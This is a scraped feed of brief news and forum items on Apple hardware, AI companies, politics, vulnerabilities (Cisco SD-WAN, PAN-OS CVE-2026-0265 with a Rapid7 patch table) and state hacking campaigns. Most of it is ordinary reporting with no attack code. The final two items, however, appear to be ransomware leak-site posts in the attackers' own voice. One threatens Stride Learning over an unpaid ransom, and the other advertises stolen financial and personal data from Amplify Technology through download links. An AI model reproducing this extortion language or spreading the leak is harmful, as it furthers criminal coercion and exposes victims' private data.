Rumors suggest Apple plans to expand Apple-designed modems to the entire iPhone 18 lineup, ending support for Qualcomm modems. The transition will bring speed and efficiency improvements, along with a little-known privacy benefit. In iOS 26.3, Apple added a Limit Precise Location setting that cuts down on the amount of location data that's available to mobile networks, improving user privacy. Mobile networks determine your location using information from cellular towers that a device connects to, but with Limit Precise Location enabled, some of the data typically provided to mobile networks is restricted. Instead of seeing location down to a street address, carriers may be limited to the neighborhood where a device is located. The problem is that this feature is currently only available on devices with an Apple-designed C1 or C1X modem, which includes the iPhone Air, iPhone 16e, iPhone 17e, and M5 iPad Pro. Devices with Qualcomm modems like the iPhone 17 Pro models do not have the Limit Precise Location setting. With the iPhone 18 Pro models and the iPhone Fold expected to use Apple modem technology, this is likely a privacy option that is set to expand to the full iPhone lineup. Reducing location precision does not impact signal quality or user experience, nor does it affect the precision of location data provided to emergency responders during an emergency call. It is only meant to limit the location data given to cellular carriers, and it is distinct from location data shared with apps through Location Services. While Apple's next set of iPhones will all likely have the new privacy feature, carriers do have to implement support. So far there are a limited number of carriers that have added the feature, but if it expands to the entire iPhone lineup and there is customer demand, it could see more widespread adoption. 
In the United States, only Boost Mobile supports limiting precise location data, but EE, BT, and Sky all support it in the UK. Carriers in Austria, Germany, Denmark, Ireland, and Thailand have also adopted support, with a list available on Apple's website. The C2 modem that Apple is rumored to be working on is more capable than the C1 or C1X, and it will offer similar performance to Qualcomm's newest modems. It is expected to support mmWave 5G, which is not a feature of the C1 or C1X. This article, "Apple's iPhone 18 Modem Switch Comes With a Quiet Privacy Benefit" first appeared on MacRumors.com
Apple's iPad that's just an iPad with no Air or Pro attached is its most appealing tablet because of the affordable starting $349 price tag, but if you've been thinking about buying one, you should wait. Apple refreshed the iPad in March 2025, so it's over a year old. That's reason enough not to buy when there's a new model on the horizon, but this year, there's even more to lose by purchasing now. The 2025 iPad has an A16 chip inside that does not support Apple Intelligence. It does not have features like Writing Tools, Image Playground, Clean Up, Live Translation, notification summaries, Smart Reply, Priority Messages in Mail, Visual Intelligence, and multiple other AI-related tools. Apple Intelligence is still new so it might not sound like a big deal to miss out on those capabilities, but not having access to it is going to become more of a problem as Apple continues implementing new AI features. Rumors suggest there are big changes coming in iOS 27. Siri is going to get smarter and turn into a full chatbot, the Camera app is going to get Visual Intelligence integration, the Photos app will have AI image editing tools, Shortcuts may be more automated, and there are probably features coming that haven't even been rumored yet. The A16 iPad will likely feel outdated in the next year or two because of the feature set it won't have access to. The next iPad is likely to get the A18 chip, and the A18 does support Apple Intelligence. It will have faster performance, more RAM, and most importantly, future-proofing and access to the AI features that Apple is investing in. Holding out for the next iPad will take some patience, because right now, we don't know when it's coming. Updating the iPad alongside the low-cost iPhone 17e would have made sense, but that didn't happen. A new entry-level iPad isn't coming in the first half of 2026, so we're likely going to be waiting until September or October. 
Bloomberg's Mark Gurman said in March that an updated low-cost iPad is "ready to go" and "still coming this year." Even though the wait may be several months, we think it's worth holding out for the next iPad instead of buying now because of the upgrade that comes with Apple Intelligence support. This article, "It's a Bad Time to Buy the Low-Cost iPad" first appeared on MacRumors.com
Chris Sutton takes on indie band Blossoms and rapper Songer plus the BBC readers and AI with his predictions for the FA Cup final and this weekend's Premier League fixtures.
A Russian state-sponsored hacking group known as Sandworm has been caught making a calculated pivot from compromised IT networks into operational technology systems that control physical infrastructure. The campaign is alarming because it does not rely on cutting-edge exploits. Instead, Sandworm walks through doors that were already left open, turning unresolved vulnerabilities into launchpads for […] The post Sandworm Hackers Pivot From Compromised IT Systems Toward Critical OT Assets appeared first on Cyber Security News.
OpenAI is going to let users access Codex, its desktop AI tool that can write code and use apps on your computer, from the ChatGPT app on your phone. Following the surge in popularity for Anthropic's Claude Code, OpenAI has been working quickly to try and catch up, including by cutting back on "side quests," […]
Cisco is warning that a critical Catalyst SD-WAN Controller authentication bypass flaw, tracked as CVE-2026-20182, was actively exploited in zero-day attacks that allowed attackers to gain administrative privileges on compromised devices. [...]
Article URL: https://router.start9.com/ Comments URL: https://news.ycombinator.com/item?id=48140541 Points: 120 # Comments: 58
Article URL: https://openai.com/index/work-with-codex-from-anywhere/ Comments URL: https://news.ycombinator.com/item?id=48140529 Points: 319 # Comments: 159
Limits Claude subscriptions to interactive use
A Chinese state-linked hacking group known as FamousSparrow has quietly infiltrated an Azerbaijani oil and gas company, exploiting an unpatched Microsoft Exchange server to plant multiple backdoors inside the network. The attack ran from late December 2025 through late February 2026 and stands as one of the most detailed Chinese APT intrusions targeting energy infrastructure […] The post Chinese APT Hackers Exploit Microsoft Exchange to Breach Energy Sector Network appeared first on Cyber Security News.
A Bitcoin holder reportedly recovered 5 BTC worth nearly $400,000 with the help of Anthropic's Claude. According to X user cprkrn, they changed their wallet password while "stoned" and forgot it, unable to regain access for more than 11 years. Tom's Hardware reports: After finding a mnemonic that actually turned out to be their old password a few weeks ago, the user dumped their entire college computer files in Claude in a last-gasp effort. The bot uncovered an old backup wallet file that it successfully decrypted, while also uncovering a bug in the password configuration that was preventing recovery up to that point. [...] It seems that the user already had some candidate passwords and multiple wallets stored on their PC. They'd been trying to brute-force their way into the locked file with btcrecover, an open-source Bitcoin wallet recovery tool, but to no success. Their luck changed for the better when they found an old mnemonic seed phrase written in an old college notebook. The HD addresses recovered by the seed phrase matched those of a specific file on their computer, confirming that it was the wallet that held the 5 BTC, but it remained encrypted. Out of frustration, cprkrn then dumped their whole college computer into Claude. This was when the AI discovered an older backup file of the wallet from December 2019 hidden in cprkrn's data. Claude also discovered an issue where the shared key and passwords that btcrecover was trying weren't combined properly. With the bug ironed out and an older wallet predating the password change, Claude successfully ran btcrecover and was able to decrypt the private keys, allowing cprkrn to transfer the five "lost" BTC to their current wallet. Read more of this story at Slashdot.
A tourist from Washington state is facing federal charges after a witness recorded what prosecutors say was a video of him hurling a coconut-sized rock at an endangered Hawaiian monk seal just off a Maui beach last week. Igor Mykhaylovych Lytvynchuk, 38, made arrangements to surrender in the Seattle area on Wednesday as special agents with the National Oceanic and Atmospheric Administration were seeking to arrest him, Assistant US Attorney Aislinn Affinito in Honolulu said. He is charged with...
Richard Socher's new $650 million startup wants to build an AI that can research and improve itself indefinitely — and he insists it will actually ship products.
Cloud-based school management and collaboration platform targeting educational institutes in India, covering online fee payments, exam management, online admissions, teacher-parent communication, and e-learning continuity.
Lesson one for aspiring dark web kingpins: don't have your laundered gold bars shipped to your home address. Read more in my article on the Hot for Security blog.
If you’ve been curious about Ray-Ban’s Meta smart glasses, right now they’re on sale in Meta’s biggest deal event outside Black Friday. As part of the company’s Summer Sale event, which runs through May 26th, the original model is on sale starting at $224.25 ($74 off) at Amazon, Best Buy, and directly from Meta, matching […]
Andy Burnham targets Westminster return & Wes Streeting resigns
People confide almost everything to their phones.
Town’s 49,000 California residents compete with Nevada data centers for energy.
Overview

On May 13, 2026, Palo Alto Networks published a security advisory for CVE-2026-0265, a signature verification vulnerability that facilitates authentication bypass on PAN-OS, the operating system that most Palo Alto Networks firewalls run. This vulnerability allows a remote unauthenticated attacker with network access to bypass authentication when Cloud Authentication Service (CAS) is enabled and attached to a login interface; the vulnerable configuration is non-default but common. CVE-2026-0265 affects PAN-OS on PA-Series and VM-Series firewalls, as well as Panorama (virtual and M-Series) appliances. Cloud NGFW and Prisma Access are not affected.

Palo Alto Networks assigned CVE-2026-0265 a “High” 7.2 CVSS score. The advisory states that the vulnerability’s severity scoring depends on interface exposure; according to the vendor, risk is highest for unrestricted management interfaces equipped with CAS, while other login portals, such as GlobalProtect gateways, are lower risk. However, the researcher who reported the vulnerability, Harsh Jaiswal of HacktronAI, publicly disputed the vendor’s severity rating. Jaiswal stated on social media that the vulnerability advisory misrepresents the criticality of the bug and the affected components; according to the HacktronAI research team, they successfully exploited CVE-2026-0265 to bypass authentication controls on multiple corporations’ GlobalProtect portals and establish VPN access. Jaiswal stated that internet-facing components are affected, and HacktronAI plans to disclose full technical details the week of May 18.

As of May 14, Palo Alto Networks has not confirmed exploitation in-the-wild of CVE-2026-0265, and there is no public proof-of-concept exploit available. However, given the researcher's statements about the practical exploitability of this vulnerability and the pending disclosure of technical details, this will likely evolve. PAN-OS software has been a frequent target for threat actors; on May 6, 2026, the PAN-OS vulnerability CVE-2026-0300 was added to CISA's Known Exploited Vulnerabilities (KEV) catalog. Patches for many affected version streams were published on May 13, and the remaining patches are expected on May 28, 2026.

Mitigation guidance

Organizations running PA-Series or VM-Series firewalls, or Panorama (virtual and M-Series) appliances, with Cloud Authentication Service (CAS) enabled should upgrade to a fixed version on an emergency basis. Patches are partially available, with many version stream fixes published on May 13 and additional version stream coverage expected on May 28. The following table outlines the affected and fixed versions:

| PAN-OS version | Affected | Fixed |
| --- | --- | --- |
| 12.1 | < 12.1.4-h5, < 12.1.7 | >= 12.1.4-h5, >= 12.1.7 (ETA: 05/28) |
| 11.2 | < 11.2.4-h17, < 11.2.7-h13, < 11.2.10-h6, < 11.2.12 | >= 11.2.4-h17 (ETA: 05/28), >= 11.2.7-h13, >= 11.2.10-h6, >= 11.2.12 (ETA: 05/28) |
| 11.1 | < 11.1.4-h33, < 11.1.6-h32, < 11.1.7-h6, < 11.1.10-h25, < 11.1.13-h5, < 11.1.15 | >= 11.1.4-h33, >= 11.1.6-h32, >= 11.1.7-h6 (ETA: 05/28), >= 11.1.10-h25, >= 11.1.13-h5, >= 11.1.15 (ETA: 05/28) |
| 10.2 | < 10.2.7-h34, < 10.2.10-h36, < 10.2.13-h21, < 10.2.16-h7, < 10.2.18-h6 | >= 10.2.7-h34 (ETA: 05/28), >= 10.2.10-h36, >= 10.2.13-h21 (ETA: 05/28), >= 10.2.16-h7 (ETA: 05/28), >= 10.2.18-h6 |
| Cloud NGFW | Not affected | N/A |
| Prisma Access | Not affected | N/A |

Older unsupported PAN-OS versions should be upgraded to a supported fixed version.

To determine if an environment is vulnerable, the official advisory provides instructions to verify whether an authentication profile using CAS is enabled and attached to a login interface. Due to discrepancies in the information shared by the vendor and reporting researchers, Rapid7 advises patching instead of implementing workarounds, wherever possible.

For the latest official mitigation guidance, please refer to the vendor advisory.

Rapid7 customers

Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-0265 with authenticated checks expected to be available in the May 15th content release.

Updates

May 14, 2026: Initial publication.
OpenAI is so frustrated with Apple over a ChatGPT integration that failed to deliver the subscribers and prominence it expected that the company is now actively exploring legal action against the iPhone maker.
OpenAI says two employees' devices were breached in the recent TanStack supply chain attack that impacted hundreds of npm and PyPI packages, causing the company to rotate code-signing certificates for its applications as a precaution. [...]
A new open source gadget called Clawdmeter turns Claude Code usage stats into a tiny desktop dashboard for AI coding power users.
An anonymous reader quotes a report from The Independent: Princeton University will soon require exams to be supervised for the first time in 100 years -- all thanks to students using artificial intelligence to cheat. For 133 years, the Ivy League school's honor code allowed students to take exams without a professor present, but on Monday, faculty voted to require proctoring for all in-person exams starting this summer. A "significant" number of undergraduate students and faculty requested the change, "given their perception that cheating on in-class exams has become widespread," the college's dean, Michael Gordin, wrote in a letter, according to The Wall Street Journal. Princeton's honor system dates back to 1893, when students petitioned to eliminate proctors -- or an impartial person to supervise students -- during examinations, according to the school's newspaper, The Daily Princetonian. The honor code has long been a point of pride for Princeton. However, artificial intelligence and cellphones have made it easier for students to cheat -- and even harder for others to spot, Gordin wrote. Despite the changes to the policy, Princeton will still require students to state: "I pledge my honor that I have not violated the Honor Code during this examination," according to the Journal. Students are also more reluctant to report cheating, according to the policy proposal. Students are more likely now to anonymously report cheating due to fears of "doxxing or shaming among their peer groups" online, the proposal says, according to the school newspaper. Under the new guidelines, instructors will be present during exams to act "as a witness to what happens," but are instructed not to interfere with students. If a suspected honor code infraction occurs, they will report it to a student-run honor committee for adjudication. Read more of this story at Slashdot.
Short-form video is built for mobile, so it may seem counterintuitive, but it's true: YouTube Shorts are becoming quite popular on the big screen.
The head of US Border Patrol, the agency tasked with securing the nation’s frontiers and increasingly tapped by the Trump administration for immigration operations in American cities, announced his resignation on Thursday. Michael Banks’ decision, announced in a Fox News interview and later confirmed by the Department of Homeland Security, was the latest leadership shake-up of officials implementing President Donald Trump’s immigration crackdown and came as the Republican administration appeared...
FSR 4.1 running on RDNA3 or RDNA2 GPUs may take a bigger performance hit.
In the United Kingdom, the popular politician Andy Burnham has come a step closer to being able to challenge Prime Minister Keir Starmer for power. Burnham, who is currently mayor of Manchester, will be allowed to stand in a parliamentary by-election, several British media outlets report. If he wins that election, he will be able to challenge Starmer for the party leadership, a challenge that many believe he would win.
On the first day of Pwn2Own Berlin 2026, security researchers collected $523,000 in cash awards after exploiting 24 unique zero-days. [...]
Ina Österlind scored in Alingsås KIK's loss. Alingsås Tidning
TSMC has been the exclusive supplier of Apple's systems-on-a-chip since 2016, but that 10-year streak could be nearing its end. Apple supply chain analyst Ming-Chi Kuo today said that Intel has "kicked off" small-scale testing of lower-end iPhone, iPad, and Mac chip fabrication, with production expected to ramp up throughout 2027 and 2028. Kuo did not indicate exactly which of Apple's A-series and/or M-series chips would be manufactured by Intel. Apple is utilizing Intel's 18A process for these chips, and it is evaluating Intel's other advanced-node technologies, according to Kuo. By sourcing chips from two suppliers, Apple can negotiate lower costs and bolster supply. In this case, Apple rekindling a partnership with Intel could win it favor with the Trump administration, which wants more U.S. manufacturing. However, Kuo said Taiwan's TSMC will remain responsible for more than 90% of Apple's chip supply. There is no indication that Intel would play a role in designing the iPhone chips, with its involvement expected to be strictly limited to fabrication. That would differ from the era of Intel Macs, which used Intel-designed processors with x86 architecture. Apple began transitioning away from Intel processors in Macs in 2020. All in all, these would be Apple-designed chips manufactured by Intel in the U.S., for use in some lower-end iPhone, iPad, and Mac models. Apple's potential return to Intel has been reported by numerous sources by this point, but an official announcement has still yet to be made. This article, "Report: Intel is Testing Production of Some iPhone, iPad, and Mac Chips" first appeared on MacRumors.com.
Last year, accessory maker Nimble came out with the Wally Stretch power adapters, and they've become some of my favorite charging options. The Wally Stretch is available in 35W and 65W options, and it has an excellent design. It's a simple cube with prongs that fold down, a retractable USB-C cable, and an extra USB-C port. The 65W model that I tested is thicker than the comparable 70W Apple charger, but it's smaller in length and width. Nimble's charger is just about two inches all around, and it looks like a block. While Nimble sells the 35W charger in black and the 65W charger in white, Apple offers 65W Wally Stretch in better colors. It comes in teal with a yellow accent and a gold-topped cable, along with deep purple with a pink accent and a silver-topped cable. I'm a big fan of any charger that's not your standard black or white, and I use the Wally Stretch chargers with my desktop power strip. The retractable USB-C cable measures in at two feet, which is a great length for desktop use. It's also worked well for traveling between locations, and two feet seems to be an all-around useful length. Some people prefer much longer cables, and there aren't options with the Wally, which is a downside. There is, however, an extra USB-C port at the bottom where a longer cable can be plugged in if desired. 65W is enough for me to power even a 16-inch MacBook Pro when it's not under heavy load, and it's more than sufficient for my MacBook Air, iPad Pro, and iPhone. Even when charging two of the latter three devices at the same time, I get fast charging. A retractable cable paired with an extra USB-C port all in a small package makes the Wally Stretch one of my most flexible power adapters. I would pick it over a standard Apple charger in all situations, and over many third-party chargers. The only situation where I reach for something else is when I need more than two ports or higher watts, but that doesn't happen too often.
I think the only thing that would make the Wally Stretch better is an XL version with two retractable cables and 140W. Nimble also makes power banks that I like a lot, again because they come in colors other than your standard black or white. The Nimble 10k Champ Portable Charger I tested is teal with yellow accents, and it has some design elements I've found useful. It's small, and it tucks nicely into a pocket or a bag. It has a lanyard, which is a feature that I find surprisingly useful for a power bank. I can always track it down in my backpack, and I can put it around my wrist when I'm charging my iPhone with a short cable. I wouldn't have thought a lanyard would make a difference, but I have a decent selection of power banks, and I always pick the ones with the lanyard first when I need one. The Nimble Champ is 3.4 inches long, 2.3 inches wide, and under an inch thick, plus it's lightweight at six ounces. There's a yellow button on the front that can be pressed to see remaining power level, which is reflected via four LED dots. That's standard for power banks, and it's fine. Some power banks have a little LED display that shows exact level, and I do prefer the more exact readout, but it's not a make-or-break feature. There are two USB-C ports for charging an iOS device or for charging the power bank, and while it does come with an included USB-C cable, I wish it was a color-matched cable instead of a plain cable. A power bank designed to stand out with a bright color should have a cable that goes along with it, but I do understand the plain cable choice because it keeps costs lower. Nimble's power bank is $60, which makes it reasonably priced. I have an Anker Nano power bank with a lanyard and a retractable cable and it is the one that I love the most. Nimble Champ is my second pick, just because I like integrated cables that don't require me to hunt down a cable and that don't result in excess cable I don't need. 
Nimble does actually have an updated version with a retractable cable and an exact readout of charging capacity, but it's more expensive at $80. This is a 10K power bank, so it has enough power to charge an iPhone 17 Pro Max from 0 to 100 and then some, but it is limited to 20W fast charging. Apple's iPhone 17 models charge to 50 percent in 20 minutes with a 40W adapter, so you're not going to get maximum charging speeds with the Nimble Champ. I probably wouldn't choose the Nimble Champ in a situation where you need to optimize for the fastest possible charging for an iPhone 17, but it's great if charging that's a bit slower isn't an issue.
Bottom Line
Nimble's Wally is a useful power adapter for everything from the Mac to the iPhone, and the retractable cable is super convenient. I'd definitely recommend it to anyone looking for a power adapter for desktop or travel use. The Nimble Champ is a budget-friendly power bank that's brightly colored and slim enough to carry in a pocket. It's a good pick as long as you don't need the fastest USB-C charging.
How to Buy
Nimble's 65W Wally Chargers can be purchased from the Nimble website for $42, but you can get the colorful versions from Apple for $60. The 10K Nimble Champ Charger is $60 from Nimble or from Apple.
This article, "Nimble Wally Stretch Review: A Colorful Charger With a Retractable USB-C Cable" first appeared on MacRumors.com.
Trump admin wants to let Musk pay $1.5M fine to settle $150 million Twitter suit.
The survivors spent about five hours on a life raft before being rescued by the US Air Force off Florida's coast.
A newly uncovered malware framework is raising serious alarms across the cybersecurity community. Researchers have identified a previously unknown implant called TencShell, a sophisticated tool capable of giving attackers full remote control over a compromised system. The discovery highlights how threat actors are quietly repurposing publicly available offensive tools to carry out targeted intrusions with […] The post New Malware Framework Enables Screen Control, Browser Artifact Access, and UAC Bypass appeared first on Cyber Security News.
It's not entirely clear how the exploit works. Microsoft says it's investigating.
The Princess of Wales shone in front of large crowds in Reggio Emilia on the final day of her tour.
Article URL: https://blog.calif.io/p/first-public-kernel-memory-corruption Comments URL: https://news.ycombinator.com/item?id=48139219 Points: 353 # Comments: 79
Article URL: https://jpain.io/god-damn-ai-is-making-me-dumb/ Comments URL: https://news.ycombinator.com/item?id=48139148 Points: 482 # Comments: 286
Anybody manage to get YellowKey working for them? We're testing our machines against all the latest vulnerabilities, and I just cannot get this one to work. It boots into the command prompt, but when I check the C: drive it says that "This drive is locked by BitLocker Drive Encryption." CopyFail on Linux was so easy, and even Dirty Frag worked. We managed to run BitUnlocker (then applied mitigations!), but YellowKey does nothing. Any ideas, gng? Maybe we're just safe? Edit1: Confirmed working on a standalone machine, newly installed Windows 11 25H2, with BitLocker manually enabled (recovery key saved to file). Initiated restart from the sign in screen. submitted by /u/jobunocru
The Reform UK leader, who is facing a Commons standards probe, said he "cannot be bought by anybody".
This annoys me to no end. My boss takes time off and she still schedules calls and attends the meetings. Go away and go do something! submitted by /u/Illnasty2
We have put together stories from our coverage of Xi and Trump’s meeting in Beijing. If you would like to see more of our reporting, please consider subscribing. 1. Thucydides Trap, personal touches – all you need to know from Xi-Trump summit so far The two leaders began the day with an extravagant welcome on the steps of the Great Hall of the People before heading in for talks. 2. After fanfare and banquet, day 1 of Trump’s China visit draws to a close Xi and Trump are expected to discuss the...
Longtime Slashdot reader schwit1 shares a report from CNBC: The U.S. has cleared around 10 Chinese firms to buy Nvidia's second-most powerful AI chip, the H200, but not a single delivery has been made so far, three people familiar with the matter said, leaving a major technology deal in limbo as CEO Jensen Huang seeks a breakthrough in China this week. [...] Before U.S. export curbs tightened, Nvidia commanded about 95% of China's advanced chip market. China once accounted for 13% of its revenue, and Huang has previously estimated the country's AI market alone would be worth $50 billion this year. The U.S. Commerce Department has approved around 10 Chinese companies including Alibaba, Tencent, ByteDance and JD.com to purchase Nvidia's H200 chips, according to the sources, who spoke on condition of anonymity due to the sensitivity of the matter. A handful of distributors including Lenovo and Foxconn have also been approved, they said. Buyers are permitted to purchase either directly from Nvidia or through those intermediaries and each approved customer can purchase up to 75,000 chips under the U.S. licensing terms, two of them said. Despite U.S. approval, deals have stalled, as Chinese firms pulled back after guidance from Beijing, one source said. The shift in China was partly triggered by changes on the U.S. side, though exactly what changed remains unclear, the person added. In Beijing, pressure is mounting to block or tightly vet the orders, a separate fourth source said. Commerce Secretary Howard Lutnick echoed that view, telling a Senate hearing last month that "the Chinese central government has not let them, as of yet, buy the chips, because they're trying to keep their investment focused on their own domestic industry." Read more of this story at Slashdot.
The Greater Manchester mayor is lining up a third attempt to be Labour leader - but must get back to Westminster first.
Gautam Adani and his nephew Sagar agreed to pay a total of US$18 million to settle Securities and Exchange Commission allegations they made false and misleading representations about Adani Green Energy. Gautam Adani would pay US$6 million and Sagar would pay US$12 million to end the SEC’s November 2024 lawsuit, under the proposed agreement filed in federal court on Thursday, which still needs a judge’s approval. Gautam Adani and Sagar agreed to the “payment of a civil penalty” totalling US$18...
China has agreed with the US to buy 200 aircraft from Boeing, according to President Donald Trump.
New warnings are now being issued about the extreme heat during the men's football World Cup, which starts in just under a month. In an open letter on the British BBC, researchers warn of the dangers of the heat. Researchers do not believe that the extra three-minute breaks introduced by FIFA will help. The warning should be taken seriously, and it applies to both players and spectators, says Lykke Tamm, chief medical officer of the Swedish Olympic Committee.
OpenAI is preparing to potentially take legal action against Apple due to a "strained" relationship with the iPhone maker, according to Bloomberg's Mark Gurman. The two companies reached a partnership in 2024 that saw ChatGPT integrated into features like Siri and Image Playground across iOS, iPadOS, and macOS. iPhone users can also subscribe to ChatGPT directly via the Settings app, with Apple taking a cut of revenue. Ultimately, though, the report said OpenAI expected ChatGPT to be more deeply integrated across additional Apple apps and to have more prime placement within Siri. OpenAI executives also believe that Apple has not sufficiently advertised the integration, resulting in fewer customers knowing about it. OpenAI initially believed the deal could generate billions of dollars per year in subscription revenue, but that "hasn't come close to happening." This expectation was seemingly set by Apple, which reportedly characterized the agreement as being an opportunity on par with its multi-billion-dollar deal with Google for search in Safari. Apple's culture of secrecy is said to have resulted in OpenAI not knowing exactly how ChatGPT would be integrated on the iPhone, iPad, and Mac. "They basically said, 'OpenAI needs to take a leap of faith and trust us,'" an unnamed OpenAI executive told Bloomberg. They described the deal as a "failure." "We have done everything from a product perspective," the executive said. "They have not, and worse, they haven't even made an honest effort." Siri users must use the word "ChatGPT" when speaking or typing a command in order to get results from OpenAI's chatbot. ChatGPT responses shown within the Siri interface also contain limited information compared to the ChatGPT app. OpenAI's attempts at renegotiating the deal have apparently stalled. As a result of the shortcomings, OpenAI is considering taking legal action against Apple, according to the report.
OpenAI is said to be weighing a range of options, including sending Apple a letter alleging breach of contract, without necessarily filing a full lawsuit. However, OpenAI still hopes to resolve the issues outside of court. iOS 27 is expected to tap into other chatbots like Google's Gemini and Anthropic's Claude, but this is apparently not one of OpenAI's grievances, as its partnership with Apple was never meant to be exclusive. In fact, iOS 27's rumored Siri app with an "Extensions" feature for other chatbots actually might better promote ChatGPT. For now, though, it appears that OpenAI feels it received the short end of the stick. This article, "OpenAI Considering Legal Action Against Apple Over 'Strained' Siri Partnership" first appeared on MacRumors.com.
South Africa's Garrick Higgo receives a rare two-shot penalty at the start of his first round - for arriving a minute late to the tee - denying him a share of the US PGA Championship lead.
A UN judge admits the 84-year-old is "in the final stages of his life", but says prison conditions in The Hague ensure his maximum comfort.
Cisco has released updates to address a maximum-severity authentication bypass flaw in Catalyst SD-WAN Controller that it said has been exploited in limited attacks. The vulnerability, tracked as CVE-2026-20182, carries a CVSS score of 10.0. "A vulnerability in the peering authentication in Cisco Catalyst SD-WAN Controller, formerly SD-WAN vSmart, and Cisco Catalyst SD-WAN Manager, formerly
A boy of about 15 was knocked down and kicked by several people in Hässelby Villastad on Thursday evening.
Five Italian tourists have died in a diving accident in the Maldives. The group was going to explore caves at a depth of 50 metres when the accident occurred. It is still unclear how the accident happened.
With today's KDE Plasma 6.7 beta release there has been a surprising amount of interest in the new revival of Plasma Big Screen as the TV-sized UI for Plasma. I've been trying it out today and it has worked out rather well, a very smooth experience, and in good shape for making its debut in next month's Plasma 6.7 release...
Eric Park tells us he doesn't plan to wear his modified cap to commencement, but his code's available for anyone with no such qualms and an upcoming ceremony
The nagatitan is the largest dinosaur found in South-East Asia and weighs as much as nine elephants.
Made-up therapy referrals, incorrect prescriptions among the common mistakes.
US President Donald Trump said Chinese President Xi Jinping offered to help broker an end to the Iran conflict and ensure freedom of navigation through the Strait of Hormuz, underscoring how Middle East tensions have become intertwined with a broader effort by Washington and Beijing to steady relations. In an interview with Fox News host Sean Hannity set to air on Thursday evening in the US, Trump said Xi had personally expressed willingness to assist amid mounting concerns over disruptions in...
How much attention did you pay to what happened in the world over the past seven days?
My manager expects me to take initiative and propose new things along with a standard of knowing the know how for a part of the job I'm pretty sure he should know I've never done before. He has experience with it and assumes that that part is familiar to everyone who works at the company. He applies pressure for things that are meant far enough into the future that we shouldn't even focus on them right now. As for the initiative, I guess there aren't that many things to actually think about improving them. One thing is the general lack of organization and communication in the company, but I don't think that's something that I should bear with as a Sys Admin. I'm rarely given a chance to fully express myself as people sure like to spin their stories and in this "market yourself" world there's really not an honest person that would even stop talking for a second to listen to the other person. Also, I'm pretty sure I'm sometimes given "helpful tips" copy/pasted straight from an AI chat along with being bombarded with information so far from my job description that I have to listen to rants and other people being miserable. Got a performance review coming up and I don't know what to think. I know I do enough, because there isn't one outstanding task left. But somehow it feels it's never enough. If you made it this far, thanks for reading and have a good day! submitted by /u/AhYesTheSoldier
I purchased one license of Windows 10 LTSC (yeah, I know, let's not talk about it) from a reseller who requested access to our M365 tenant to apply the license. There were two agreements, one to add them as a reseller and one to give them various permissions as part of GDAP. They were requesting Helpdesk Administrator, License Administrator, Cloud Application Administrator, Billing Administrator, Service Support Administrator, and Global Reader. That feels a little excessive. When I pushed back, they gave me a spiel about it just being a wording thing by Microsoft and they don't actually receive those permissions. When I tested it, it looks like they actually receive that level of permission. Is this new? Is this common? Am I out-to-lunch thinking this is excessive? submitted by /u/TooManyRequests_429
Working on a school project around K-12 security awareness and KnowBe4 feels way too enterprise heavy for the context. Looking for something that actually changes behavior and not just gets people to click through a module to check a box. With platforms like Canvas recently getting caught up in phishing/security incidents, it feels like schools are becoming bigger targets and I’m not convinced checkbox-style training is enough anymore. Any alternatives you've tried and actually liked? submitted by /u/DonutFlimsy8993
Here is a selection of events in western Sweden on Thursday, May 14.
Cybersecurity researchers are sounding the alarm about what has been described as "malicious activity" in newly published versions of node-ipc. According to Socket and StepSecurity, three different versions of the npm package have been confirmed as malicious: node-ipc@9.1.6, node-ipc@9.2.3, and node-ipc@12.0.1. "Early analysis indicates that node-ipc@9.1.6, node-ipc@9.2.3, and node-ipc@12.0.1
Article URL: https://github.com/DepthFirstDisclosures/Nginx-Rift Comments URL: https://news.ycombinator.com/item?id=48138268 Points: 366 # Comments: 76
We're on KnowBe4 right now. Some users will not do the training, so the simulated phishing messages are probably providing more value. They're too predictable though. The fake Teams invites all look the same. Many claim to come from the HR team, or from IT, or from the CEO, but we're small enough that everyone knows who the HR person is. The hackers will at least grab real names from LinkedIn. Do you have to customize all your phishing templates? Are you seeing phishing messages that could fool you? submitted by /u/That_Fixed_It
He quits as health secretary after days of speculation that he is preparing to launch a leadership challenge against Sir Keir Starmer.
Article URL: https://arkadiyt.com/2026/05/13/removing-the-modem-and-gps-from-my-rav4/ Comments URL: https://news.ycombinator.com/item?id=48138136 Points: 824 # Comments: 422
We wanted to let the Exchange Server community know that there are no security releases for any version of Exchange Server in May 2026, for customers with Exchange SE, or Exchange 2016 or 2019 ESU. Please keep upgrading your organizations to Exchange SE. Update 5/14/2026: While there is no security release (Security Update) in May 2026, please see our later blog post mentioning a mitigation for an Exchange Server CVE disclosed on May 14: Addressing Exchange Server May 2026 vulnerability CVE-2026-42897 | Microsoft Community Hub The Exchange Team
The three-wheel, two-seat EV has been in development since 2006.
Cuba is out of both oil and diesel, says the country's energy minister Vicente de la O Levy, according to Reuters. The statement comes after several months of halted fuel deliveries to the crisis-hit island.
Anthropic announced today that it is partnering with the Gates Foundation to "commit $200 million in grant funding, Claude usage credits, and technical support for programs in global health, life sciences, education, and economic mobility over the next four years." "This commitment is central to Anthropic's efforts to extend the benefits of AI in areas where markets alone will not," the company says. Reuters reports: One area of focus is language accessibility. AI systems have performed poorly in writing and translating dozens of African languages, so Anthropic and the foundation want to support better data collection and labeling that would be released publicly to help improve models across the industry, said Janet Zhou, a Gates Foundation director. Another area under consideration is releasing so-called knowledge graphs that could help AI systems better meet the needs of teachers in sub-Saharan Africa and India, Zhou said. The public-goods focus has come from "the needs of different partners and governments, including some of the fears that they may have around proprietary lock-in and sovereignty," Zhou said. One initiative will equip research centers to use Claude to predict drug candidates for treating HPV and preeclampsia, diseases that have been less commercially attractive for pharmaceutical companies to research, Zhou and Anthropic's Elizabeth Kelly said. Anthropic [...] is embracing the work to fulfill what Kelly described as its founding mission to benefit humanity. "This announcement is really core to who we are as a company," said Kelly, who leads Anthropic's beneficial deployments team.
Attackers uniquely fingerprint victims before delivering spear-phishing payloads aimed at espionage, in the latest campaign from the Belarussian nation-state threat group.
Stride Learning should've paid the ransom. We were only asking $500,000 in bitcoin or monero it's not that hard. This is a warning to all companies that if you don't pay it will get leaked. If you pay you have our word that it's deleted also with a picture before and after. If you want we will also take a video.
Amplify technology has been a victim of an attack. Their project they were working on with Pakistan and other countries got stolen. We stole 1.69Gb of data. For all the proof and files it's on the mega.nz link below. For screenshots go to our Telegram channel below. They didn't take us seriously so now they pay for it. The data contains the following below: financial records, pii, pictures of houses personal stuff like address, fathers name, address, etc The company Website: https://www.amplifytechnology.co.uk In the UK, Amplify Technology Limited is a strategic technology consultancy based in Bromsgrove, England. They specialize in helping organizations align their technology with business goals through advisory and implementation services. WHAT THEY DO...
